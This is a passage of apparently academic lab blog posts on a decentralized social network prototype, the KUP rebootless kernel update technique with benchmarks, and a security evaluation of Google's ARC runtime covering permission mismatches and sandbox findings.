is deleted from the DHT. If the receiver comes online after the messages
have been permanently removed from the DHT, then the receiver cannot
access them. However, if the sender sends a new message which has
message identifier higher than the identifier of the last successfully
recieved message, then the reciever detects this gap and requests for
the missing messages. In that case, the sender once again introduces
these messages in the DHT. </p>
<h2>Post delivery overlay network</h2>
<p>As a baseline post delivery design, flooding sync tries to propagate posts to
as many friends (and friends of friends) as possible. So the chance for a peer
to receive her missed posts from a friend when coming back online is
increased. DHT based sync exploits the chance of synchronization from other
online users than one's friends.</p>
<h2>Other considerations</h2>
<p>More considerations must be given without the support from a centralized
server. First, a flexible bootstrapping service is necessary for users to
reach the scripts in the first place. Besides providing an HTTP service, the
code can also be placed at public places such as CDN, Github, Dropbox as long
as the integrity can be ensured before running (e.g., Firefox supports code
signature of Javascript through signing JAR archive.). Second, instead of
directly managing the user credential, we can outsource the user credential to
existing public key servers like keybase.io. A user's identity is associated
with her public key which is accessible from the key server. Third, without the
centralized server as the third party authority, users can endorse each other by
signing trusted friend's public keys. The establishment of new friendship can be
based on the verification of endorsements.</p>
<h1>Prototype and preliminary evaluation</h1>
<p>We have implemented a prototype in JavaScript.
At the peer side, the communication and storage manager are based on the W3C
standardized APIs for HTML5: WebRTC and Indexed DB.
Therefore, our prototype can support Chrome 23+, Firefox 10.0+, Opera 15+ at the
desktop end, and Android 4.4+, Firefox Mobile 22.0+ and FirefoxOS 1.0.1+ for the
mobile platform. The crypto module uses OpenGPG for the encryption, hashing, and
key signing operations. Peers retrieve others' public key from the public key
infrastructure Keybase.io. At the SAFE store side, a simple key-value store is
applied using Redis.</p>
<p>We evalute the performance of flooding sync by simulating users with Webdriver.
The simulated users login and logout the service periodically. The post arrival
latency and the storage overhead of every online activity is recorded. The
result of latency and storage overhead is plotted in the following. </p>
<p><img src="/blog/deface/sync.svg" alt="Sync evaluation" width="80%" /></p>
<p>The SAFE store performance is measured with two metrics: throughput and
capacity. From the real experiment, the result shows that with a single
instance of redis, SAFE can process 1,401 login requests per second, 2,307,
4,549, 5,818, and 6,620 as the number of sharding increses in double,
respectively. From the result of storing 192,000 records, experiment shows
that a each login request consumes 51K bytes. Assuming 64GB of RAM for the
SAFE server, a single instance could store upto 1.34 million users.</p>
<p>One might think that replacing Facebook is a pipe dream, but we will
take a bold first step to replace a chatting service for closed
groups like a web-based IRC. Stay tuned.</p>Rebootless Kernel Update2015-02-10T10:10:00+01:002015-02-10T10:10:00+01:00Sanidhya Kashyaptag:gts3.org,2015-02-10:/2015/rebootless-kernel-update.html<p>Seamlessly updating OS with least application downtime.</p><p>OS update is a crucial step not only to patch security
vulnerabilities or fix bugs, but also to add features that improve
the performance of the system. But, it comes at the cost of rebooting
the system, leading to unavoidable downtime and service disruption. It is an
essential to mitigate critical threats immediately, but for end users, the inevitable
downtime during an update simply degrades the productivity and usability of OS. This
is critical to enterprises; for example, Amazon looses a whopping $66,000 [2] for a
single minute of downtime. And, this downtime / disruption can further
exacerbate in case if the update fails.</p>
<p>To solve the aforementioned issues, following are the two pragmatic
techniques which are in practice:</p>
<p><img src="/blog/kup/kpatch.svg" alt="Patches" width="70%" /></p>
<ul>
<li>
<p><em>Rolling updates</em> - First apply an update to a small group of machines,
then extend it to others in case of no failure. Although this
technique facilitates a safe measure against mass failure, there is still
a considerable downtime while rebooting the systems.</p>
</li>
<li>
<p><em>Dynamic hot-patching</em> - This technique directly applies the patches
to the running kernel in-place. As a result, the system reboot becomes
unnecessary, resulting in no application downtime. Although, it seems
attractive, it is inherently limited to particular set of patches
consisting of simple code change than semantic one. We tested an
open source tool called <code>kpatch</code> which can only support <strong>1</strong> out of
<strong>16</strong> minor updates over six months of Ubuntu's releases (Linux 3.13.0.32 -> 34).
The above figure shows its limitations. X-axis represents before-version and
after-version, and dotted bars represent failures in executing <code>kpatch</code>.</p>
</li>
</ul>
<p>Even though these solutions are pragmatic, they are either inherently limited or
do not completely solve the issues of system downtime and service disruption
while updating the system. To address these issues, we come up with idea of <code>KUP</code>
- a simple, yet effective update mechanism that enables seamless kernel updates
without any modification of the commodity operating systems (or with minimal
changes for least downtime) by using an application with a stable and matured
checkpoint-and-restart (C/R) technique. <code>KUP</code> not only supports the full
system update for any kind of complex patches, but also facilitates
the mitigation of update failure with two extensions: (1) <em>safe fallback</em>
that enables automatic recovery upon upgrade failures, by restoring back to
the original system before update; and (2) <em>update dryrun</em> which allows users
to check if a new system update breaks running applications or services before
actually applying it to the real machine. Another crazy extension that we
have thought of is <em>application agnostic fault tolerance</em>, in which the
application can be replicated either to provide high availability or even
load balancing.</p>
<p>Our evaluation shows that <code>KUP</code> provides a fast kernel update with various
running applications such as <em>memcached</em>, <em>mysql</em> or in the middle of Linux
kernel compile. For example, <code>KUP</code> can update the Linux kernel from v3.17-rc7
to 3.17.0 with a downtime of total 2.4 sec (constant), without losing 5.6 GB
(or even larger) of <em>memcached</em> data.</p>
<h1>Approach and Design</h1>
<p><img src="/blog/kup/arch.svg" alt="Overview" width="70%" /></p>
<p><code>KUP</code>'s update procedure is clean and simple: it first checkpoints the process,
followed by a kernel switch and later restarts the application by restoring its
checkpointed state (see above figure). While designing <code>KUP</code>, our prime focus has
been to obtain the maximum performance out of the C/R <strong>without</strong> modifying the
commodity OS. Later, we also concentrated on squeezing the maximum performance
(having least downtime) for C/R with <strong>minimal changes</strong> to the kernel. To achieve
this, <code>KUP</code> leverages four new techniques for reducing the system downtime during update:</p>
<center>
<table border="1" width="70%">
<tr align="center">
<th>Stages</th>
<th>Inc.</th>
<th>Ond.</th>
<th>Inc+Ond</th>
<th>FOAM</th>
<th>RP-RAMFS</th>
<th>PPP</th>
</tr>
<tr align="center">
<td>Checkpoint</td>
<td>+83.5%</td>
<td>--</td>
<td>+83.5%</td>
<td>+83.5%</td>
<td>+94.0%</td>
<td>+99.7%</td>
</tr>
<tr align="center">
<td>Restore</td>
<td>-15.2%</td>
<td>+99.6</td>
<td>-42.8%</td>
<td>+99.6%</td>
<td>+99.6%</td>
<td>+99.4%</td>
</tr>
</table>
Techniques for improving <code>KUP</code>'s performance. Inc. and Ond. represent
the incremental checkpoint and on-demand restore respectively. Inc+Ond is the combination
of the previous two, whereas **FOAM** is `KUP`'s simple data structure for obtaining
the best performance without any kernel change. **RP-RAMFS** represents **FOAM** based
C/R scheme used on RAM file system. **PPP** is the modification applied in the kernel
to achieve best performance.
</center>
<h2>1. Incremental checkpoint</h2>
<p>For applications with large working set size (WSS), a single checkpoint results
in huge downtime. To mitigate this issue, <code>KUP</code> relies on the idea of
<strong>incremental checkpoint</strong>. <code>KUP</code> <em>asynchronously</em> takes multiple snapshots of
the process' memory followed by a <em>synchronous</em> snapshot. With
its introduction, we observe a significant improvement of 83.5% (Inc. column)
over a simple checkpoint approach with respect to the downtime. Currently,
<code>KUP</code> relies on <strong>criu</strong>[1] for application C/R and it already provides incremental
checkpoint functionality.</p>
<h2>2. On-demand restore</h2>
<p>The downtime is experienced during both: the checkpoint and restore period. Thus,
application restart also adds up an equivalent time to that of checkpointing.
To resolve this issue, <code>KUP</code> restarts the application without loading its
entire memory, rather reload them <em>on-demand</em> when the process tries to access
a particular page. This approach is similar to standard copy-on-write (COW)
optimization, thereby drastically decreasing the downtime by 99.6% (column Ond).</p>
<p>Using incremental checkpoint along with on-demand restore seems to be an apt
choice. But, from the above table, even the simple restore with incremental
checkpoint adds an overhead of 15.2% (Restore row of Inc. column). This is due to
the extra work in maintaining a sequence of images taken during
incremental checkpoint, in which the restore code path wastes significant amount
of time in linearizing the data back to the process' memory. On further
combination of both incremental checkpoint and on-demand restore, we observe a
huge downtime for on-demand restore by 42.8%. This occurs because we need to map
the memory at the page granularity level for dynamic reloading of the pages
with the help of <strong>mmap()</strong> system call, which results in a huge overhead.</p>
<h2>3. File offset-based address mapping (FOAM)</h2>
<p>In order to effectively use the incremental checkpoint with on-demand
restore, <code>KUP</code> uses a simple data structure, called <em>file offset based
address mapping</em> (<strong>FOAM</strong>) for checkpointing the process' memory. <strong>FOAM</strong>
uses direct one-to-one mapping between the process address and a huge file,
thus representing the whole virtual address space of the process. The free regions
in the address space (not allocated to the process) are represented as <em>holes</em>,
which is already supported by the modern file systems.</p>
<p>By using <strong>FOAM</strong>, we reap the following benefits:</p>
<ul>
<li>There is no maintenance cost of metadata now.</li>
<li>There is no data fragmentation issue i.e. everything gets
updated in a single place.</li>
<li>Simplifies the work to enable on-demand restore.</li>
</ul>
<p>The above table (column FOAM) shows the benefits of using <strong>FOAM</strong> as it
facilitates us with the best of both worlds.</p>
<h2>4. Persistent physical pages (<strong>PPP</strong>)</h2>
<p>The bandwidth of the storage medium also plays its part when the application
is checkpointed and restarted. To circumvent this, we introduce a RAM-based
file system (<strong>RP-RAMFS</strong>) that stores its data purely in RAM but makes it
persistent across reboot. Even though <strong>RP-RAMFS</strong> seems a viable option,
it has a critical limitation. <code>KUP</code> cannot perform C/R on an application
with working set size more than half of the actual memory space.</p>
<p>We overcome the limitation of <strong>RP-RAMFS</strong> by introducing new mechanism in the
kernel by letting it preserve the application memory across update. <code>KUP</code>
saves the virtual address and physical pages pair of the process which gets
used during restoration. <code>KUP</code> achieves this functionality by introducing
two new system calls - <code>preserve(pid, mapinfo, nele)</code> for transferring
the data to the kernel while checkpointing and <code>prestore(mapinfo, nele)</code>
during application restart.
Following are the steps that <code>KUP</code> uses for <strong>PPP</strong>:</p>
<ul>
<li>During the checkpoint phase, <code>KUP</code> dumps the virtual-to-physical mapping
of the targeted process in userspace and passes the relevant information
to the kernel via <code>preserve</code> syscall.</li>
<li>Before updating, <code>KUP</code> creates a list of new pages that are not touched
by the new kernel unless specified.</li>
<li>During new kernel's boot, <code>KUP</code> globally reserves the required set of requested pages.</li>
<li>During application restart, by using <code>prestore</code> syscall, <code>KUP</code> passes the
information to the page-fault handler, thereby allowing it to correctly
rebind the faulted virtual address with the reserved physical page.</li>
</ul>
<p>This technique not only improves the performance by instantly binding the pages at the
page level granularity, but also avoids redundant memory copy.</p>
<h1>Evaluation</h1>
<p>It is time to test our design and implementation. Now, we will discuss
about the about the effectiveness of our techniques.</p>
<p><img src="/blog/kup/memcached.svg" alt="Memcached" width="70%" /></p>
<p>The above figure shows the effectiveness of various techniques - on-demand, <strong>FOAM</strong> and
<strong>PPP</strong> techniques on both SSD and <strong>RP-RAMFS</strong> using memcached as the application.
The x axis is the network bandwidth and x axis is the time-line. At time t=193 second,
the kernel update is started for each case. As already discussed, <strong>PPP</strong>
is the best approach with the least downtime of around 2.4 seconds. Whereas <strong>FOAM</strong>
is the next best candidate in terms of performance.</p>
<p><img src="/blog/kup/micro.svg" alt="Micro-benchmark" width="70%" /></p>
<p>The above 3 figures (a,b,c) illustrate the impact of using our <strong>FOAM</strong> for both
checkpoint and restore phase. (a) shows the downtime caused by checkpointing with varying
WSS. (b) shows the downtime when changing the percentage of write under fixed WSS, and
the overhead of <strong>FOAM</strong>'s incremental approach suddenly becomes high with the increase
in write percentage. (c) illustrates the advantage of on-demand restore when increasing
the WSS. (d) shows the performance of <strong>PPP</strong> and <strong>FOAM</strong> (on <strong>RP-RAMFS</strong> and SSD)
with varying WSS (50% write) up to 72 GB, which is larger than half of the
system's memory (128 GB). <strong>RP-RAMFS</strong> fails at 56GB as it requires free RAM
space for checkpointing the process, therefore it cannot support large WSS. On the
contrary, <strong>PPP</strong> can efficiently support applications with large WSS.</p>
<p>There are other aspects that we have not covered including the testing of other
applications, <code>KUP</code> against <code>kpatch</code>, and the kernel switch downtime. We will go
in detail in our next blog post along with some other cool ideas.</p>
<hr>
<p>[1] criu: http://www.criu.org/Main_Page</p>
<p>[2] Amazon.com Goes Down, Loses $66,240 Per Minute. http://www.forbes.com/sites/kellyclay/2013/08/19/amazon-com-goes-down-loses-66240-per-minute</p>
<p align="right">Proofread by Taesoo Kim and Changwoo Min.</p>Security Evaluation for ARC2014-12-10T12:12:00+01:002014-12-10T12:12:00+01:00Meng Xutag:gts3.org,2014-12-10:/2014/arc-security.html<p>Security issues caused by permission mismatch and inter-"component" interaction in ARC</p><h1>Introduction</h1>
<p>The official <a href="https://support.google.com/chromebook/answer/6088175?hl=en">ARC (App Runtime for Chrome) project</a>, announced by Google in
<a href="https://www.youtube.com/watch?v=wtLJPvx7-ys#t=6070">Google I/O 2014</a>
enables running of Android apps on Chrome environment.
The official ARC is available for Chrome OS only in the form of Extension.
It is subsequently extended (or hacked, technically) by vladikoff and others
into a general Chrome Extension
<a href="https://bitbucket.org/vladikoff/archon/src">ARChon</a>
that can be loaded onto a Chrome browser running on Windows, OS X and Linux.
The ARChon is also complemented by a repackaging script,
<a href="https://github.com/vladikoff/chromeos-apk">chromeos-apk</a>
which transforms an ordinary Android APK file into a loadable ARC app
(also, a Chrome App). </p>
<h1>Understanding ARC</h1>
<p>Unlike the Android Emulator shipped with Android SDK
or other commercial solutions (e.g. <a href="https://www.genymotion.com">Genymotion</a>),
the goal of ARC is not to build another emulator that runs the full
Android OS images and multiple apps. Instead, it aims at providing the
<strong>minimum</strong> codebase to run a <strong>single</strong> app.
Based on the analysis of files constitutes ARC implementation, it strips
out all components unrelated to the Dalvik VM, and preserves
the system libraries and the Android API framework.
For example:</p>
<ul>
<li>Most files in <code>_platform_specific/nacl_${arch}/</code> should be in <code>/system/lib/</code> on an Android image.</li>
<li><code>dalvikvm.so</code> and <code>dexopt.so</code> should be wrappers for <code>dalvikvm</code> and <code>dexopt</code>.</li>
<li>There are also libraries used by Android Emulator from OpenGL ES hardware emulation, such as <code>libEGL_translator.so</code>, <code>libOpenglSystemCommon.so</code>, etc.</li>
<li><code>readonly_fs_image.img</code> is the filesystem image for Android.</li>
</ul>
<p>Source code of the ARC can be found at this
<a href="https://chromium.googlesource.com/arc/arc/+/master">link</a>.
However, this only allows you to build the <code>.so</code> libraries,
a fully running system cannot currently be built.
The following security evaluation work we have done is experimental
and mainly for fun and learning.
Source code for the experiments we conducted can be found on
<a href="https://github.com/meng-xu/arc-security">GitHub</a>.</p>
<h1>Permission Mismatch</h1>
<h2>Issues</h2>
<p>Through our experiments, we observed that
** ARC does not respect Android permission model <em><em>,
i.e., a repackaged app has access to
privileged operations even without declaring corresponding permissions.
You can compile run the <code>TestPermission</code> app in the
the above GitHub link to confirm this issue.
When running on ARC,
the app has Internet access even without declaring
<code><uses-permission android:name="android.permission.INTERNET" /></code>
in its </em>manifest</em> file.</p>
<h2>Solutions</h2>
<p>Given the issue, the first intuition is that ARC delegates permission checking
to Chrome Runtime (together with permission enforcement for Chrome App).
And I did found that the repackaging script adds every permission to the
repackaged app, regardless of the actual permissions declared.</p>
<div class="highlight"><pre><span></span><code><span class="nt">"permissions"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"gcm"</span><span class="p">,</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"socket"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"tcp-connect"</span><span class="p">,</span><span class="w"> </span><span class="s2">"tcp-listen"</span><span class="p">,</span><span class="w"> </span><span class="s2">"udp-bind"</span><span class="p">,</span><span class="w"> </span><span class="s2">"udp-send-to"</span><span class="p">,</span><span class="w"> </span><span class="s2">"resolve-host"</span><span class="p">]</span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"unlimitedStorage"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"notifications"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"clipboardRead"</span><span class="p">,</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"fileSystem"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"write"</span><span class="p">]</span>
<span class="w"> </span><span class="p">},</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"https://clients2.google.com/"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"videoCapture"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"clipboardWrite"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"identity.email"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"alarms"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"storage"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"identity"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="s2">"audioCapture"</span>
<span class="p">]</span>
</code></pre></div>
<p>Therefore, the first solution is to build a map between
Android app permissions to Chrome App permissions and instrument
the repackaging script to scan for Android permissions first
and declare only necessary Chrome permissions for the repackaged app.</p>
<p>Following this approach, there are two difficulties to be overcome:</p>
<p><strong>1) Get the list of permissions honored by ARC</strong></p>
<p>As the permissions declarable in the ARC environment
might be different compared with the stock Android,
we can not rely on the stock Android OS image for the permission list
(plus there is no official document that provides an exhaustive
permission list available for Android).
This problem is tackled by dynamically probing <code>PackageManager</code>
with the following code snippet:</p>
<div class="highlight"><pre><span></span><code><span class="nx">getPackageManager</span><span class="p">().</span><span class="nx">getPackageInfo</span><span class="p">(</span><span class="s2">"android"</span><span class="p">,</span><span class="w"> </span><span class="nx">PackageManager</span><span class="p">.</span><span class="nx">GET_PERMISSIONS</span><span class="p">);</span>
</code></pre></div>
<p>This <a href="https://github.com/meng-xu/chromeos-apk/blob/master/perm/android-perm.json">file</a>
lists the permissions available for ARC environment with protection level=dangerous,
extracted by the app <code>AndroidPermissionProber</code>.</p>
<p><strong>2) Manually map Android permissions to Chrome permissions</strong></p>
<p>Unfortunately, this process cannot be automated because it requires a lot of
domain knowledge. Although similar in nature, the two permission models are not
designed the same way, by the same team, or to be used in the same scenarios,
which creates a lot of mismatch between these two models. Based on my
experiments and understanding, I finally ended up with the following mapping:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="w"> </span><span class="nt">"permission"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"android.permission.SYSTEM_ALERT_WINDOW"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"alarms"</span><span class="p">,</span><span class="w"> </span><span class="s2">"notifications"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.CAMERA"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"videoCapture"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.INTERNET"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="nt">"socket"</span><span class="p">:[</span><span class="s2">"tcp-connect"</span><span class="p">,</span><span class="s2">"tcp-listen"</span><span class="p">,</span><span class="s2">"udp-bind"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"udp-send-to"</span><span class="p">,</span><span class="s2">"resolve-host"</span><span class="p">]}],</span>
<span class="w"> </span><span class="nt">"android.permission.NFC"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"copresence"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.RECORD_AUDIO"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"audio"</span><span class="p">,</span><span class="w"> </span><span class="s2">"audioCapture"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.WRITE_EXTERNAL_STORAGE"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"storage"</span><span class="p">,</span><span class="w"> </span><span class="s2">"unlimitedStorage"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.ACCESS_FINE_LOCATION"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"location"</span><span class="p">,</span><span class="w"> </span><span class="s2">"geolocation"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.AUTHENTICATE_ACCOUNTS"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"identity"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.USE_CREDENTIALS"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"identity"</span><span class="p">],</span>
<span class="w"> </span><span class="nt">"android.permission.MANAGE_ACCOUNTS"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"identity"</span><span class="p">]</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"manifest"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"android.permission.BLUETOOTH"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="nt">"bluetooth"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nt">"socket"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nt">"low_energy"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">}}],</span>
<span class="w"> </span><span class="nt">"android.permission.BLUETOOTH_ADMIN"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="nt">"bluetooth"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nt">"socket"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nt">"low_energy"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">}}]</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Instrumenting the repackaging script to scan for Android permissions
is trivial given the <code>adbkit-apkreader</code> library.</p>
<h2>Future work</h2>
<p>The above solution, although works in practice, might not be the
best solution as it totally abandoned the GID/UID based permission
model in Android OS. For example, an app with INTERNET permission
is effectively being assigned with GID 3003. However, when we try to
find the assigned GIDs for a no-permission app in ARC environment, we
found that ARC assigns a lot more GIDs than necessary to the app!</p>
<p><img alt="aid" src="/blog/arc-security/aid.jpg"></p>
<center> Assigned GID in ARC environment (left) and assigned GID in stock Android OS (right). </center>
<p>For example, the same app <code>TestAppID</code> (without any permissions declared) is tested in
ARC (left) as well as Android Emulator in Android SDK (right). It has normal
GIDs in the Emulator but ARC assigns more GIDs (including GID 3003 representing
INTERNET permission) to the app, which essentially allows the app to have
INTERNET permission (as long as the outer Chrome permission allows).</p>
<p>I am currently unclear of the cause of this issue. I suspect that
these GIDs are hard-coded into the ARC so that
each app is automatically granted with these permissions. Such a design
choice enables quick development and testing of core functions of ARC
and reduces app crashes caused permission enforcement issues. However,
this loophole, if not fixed, might grow to a more serious security issue once
ARC gets popular. I believe it is worthwhile to have more investigations
on this matter and fix it as soon as possible. </p>
<h1>Inter-"Component" Interaction</h1>
<p>Inter-"component" interaction here refers to the potential interactions
between ARC app and (1) other ARC apps,
(2) other Chrome extensions and apps,
(3) webpages, and
(4) the underlying OS.</p>
<p>I have been trying to launch attacks against ARC app from outside of ARC
environment but encountered little successes. Therefore, I came to the
general conclusion that there is no particular advantage gained by attacking
the ARC model, because of ARC being heavily sandboxed. </p>
<p><img alt="arc-sandbox" src="/blog/arc-security/arc-sandbox.jpg"></p>
<center>Sandboxes of ARC environment</center>
<p>The intuition is that: in order for an ARC app to do any harm to other Chrome
components (apps, extensions or webpages), it must break the NaCl sandbox and
the Chrome app (renderer) sandbox. In other word, if there is a way that ARC app
can leverage to break these sandboxes (for example, through JNI), it can
always be translated to a break of Chrome app sandbox. Hence, there is no
additional advantage gained by attacking Chrome from the ARC app.</p>
<p>In addition, following is a list of findings
I have gained by experimenting with the ARC.</p>
<ul>
<li>
<p>There is no app-to-app interaction on ARC.
This implies that if an Android app is malicious on Android without cooperation
from other apps, then when ported to ARC, the app is still malicious.
And, if an Android app is malicious on Android but does requires cooperation
from other apps (i.e., one can exploit vulnerabilities in ContentProvider
of SMS app to steal messages). The app will not work on ARC because
ARC is designed for <strong>single</strong> app settings and there will not be another
SMS app installed.</p>
</li>
<li>
<p>Android rooting does not make much sense.
Rooting or in broader term, system privilege escalation attack generally
has two purposes: (1) extract hidden information (like information of
other apps) or (2) gain additional capabilities (like networking). However,
in ARC, (1) is not possible. And protected by Chrome permission model,
(2) is not possible.</p>
</li>
<li>
<p>Chrome extension may cause launch of a DoS attack against ARC app, leveraging
the <code>chrome.processes</code> <a href="https://developer.chrome.com/extensions/processes">API</a>
and repeatedly killing the NaCl process that hosts ARC. However,
this feature can be used to kill any other processes (including webpages)
and are not specific to ARC. One can play with this feature with the
<code>processes</code> program in <code>crx</code> folder.</p>
</li>
<li>
<p>The system default browser will have the cookies generated and consumed by
the ARC app if the ARC app uses <code>WebView</code> to browse for web contents.
You can play with this feature with the <code>cookies</code> program in <code>crx</code> folder
and the <code>TestIntentBrowser</code> app.</p>
</li>
<li>
<p>Data stored in both "internal" storage (phone storage) or "external" storage
(SD card) are not safe. ARC will store these data in an obfuscated (but still
understandable) filesystem and one may find these items in path
<code>{Chrome support folder}/Default/Storage/ext/{app id}/def/File System/</code> (For Mac OS).</p>
</li>
<li>
<p>ARC app may have access to OS Filesystem (via browser file chooser), but
will not be able to modify them, i.e. ARC will first copy these items to a
different location and feed the app with the copy instead of the original file.</p>
</li>
</ul>
<p align="right">Proofread by Sanidhya Kashyap and Taesoo Kim.</p>